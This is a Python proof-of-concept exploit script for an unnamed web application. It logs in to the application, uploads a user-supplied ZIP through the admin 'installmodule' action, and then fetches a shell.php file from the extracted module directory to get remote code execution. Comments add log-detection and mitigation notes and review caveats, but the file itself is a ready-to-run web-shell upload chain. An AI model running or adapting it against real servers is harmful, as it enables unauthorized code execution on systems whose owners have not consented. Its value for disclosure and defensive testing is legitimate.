POC / poc.py PY
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

# Proof-of-concept flow, top to bottom: log in to the web application, upload
# a ZIP through the admin "installmodule" action, then request a PHP file
# expected to exist under data/modules/payload/ afterwards.
# Weakness shown: an authenticated module installer whose extracted content
# ends up reachable (and, judging by the final request, executable) under the
# web root.
# Defensive notes grounded in the requests below:
#   * Detection: a POST to admin.php?action=installmodule followed by a GET
#     for a .php file under data/modules/ is the request pair to look for in
#     web-server logs.
#   * Mitigation (to be confirmed against the affected application): restrict
#     who can reach the module installer, validate archive contents before
#     extraction, and do not let the server execute scripts from the module
#     directory.

# Target and credentials are placeholders that must be filled in by hand.
hostname = "replace_with_your_hostname"
username = "replace_with_your_username"  # login username
password = "replace_with_your_password"  # login password

# Both endpoints use plain http://, so the password in the login POST travels
# unencrypted.
login_url = f"http://{hostname}/login.php"
upload_url = f"http://{hostname}/admin.php?action=installmodule"
headers = {"Referer": login_url}
# The password is sent in the "cont1" field. The *value* of `username` is used
# as a form-field name with an empty value, not as a credential value.
# NOTE(review): that looks unintended; confirm against the login form.
login_payload = {"cont1": password, username: "", "submit": "Log in"}

# Path of the local ZIP to upload; read interactively and not validated.
file_path = input("ZIP file path: ")

# Build the multipart body for the upload form: the archive goes in the
# "sendfile" field and is always presented to the server as "payload.zip".
# The file handle opened here is never explicitly closed by this script.
multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("payload.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

# A Session keeps the cookies set by the login response so the upload request
# is sent with them. No timeout is passed to any request in this script.
session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)

# Success is judged by the HTTP status alone. A 200 does not by itself prove
# that authentication succeeded. Presumably the application can also answer
# 200 when it re-renders the login form; verify.
if login_response.status_code == 200:
    print("Login successful")

    # Content-Type must carry the multipart boundary chosen by the encoder.
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    # Same caveat as for login: only the status code is inspected, not the
    # response body, so "uploaded successfully" is not confirmed here.
    if upload_response.status_code == 200:
        print("ZIP file uploaded successfully.")
    else:
        print("ZIP file upload error. Response code:", upload_response.status_code)
else:
    print("Login problem. Response code:", login_response.status_code)

# This request sits outside the if/else above, so it is sent even when login
# or upload reported an error. It uses requests.get rather than the session,
# i.e. it carries no login cookies. The path implies the uploaded archive is
# unpacked under data/modules/payload/ and that files there are served without
# authentication. That is inferred from the URL, not shown by this script.
rce_url = f"http://{hostname}/data/modules/payload/shell.php"
rce_response = requests.get(rce_url)

# Print whatever the server returned for that path; the status code is not
# checked, so an error page would be printed as well.
print(rce_response.text)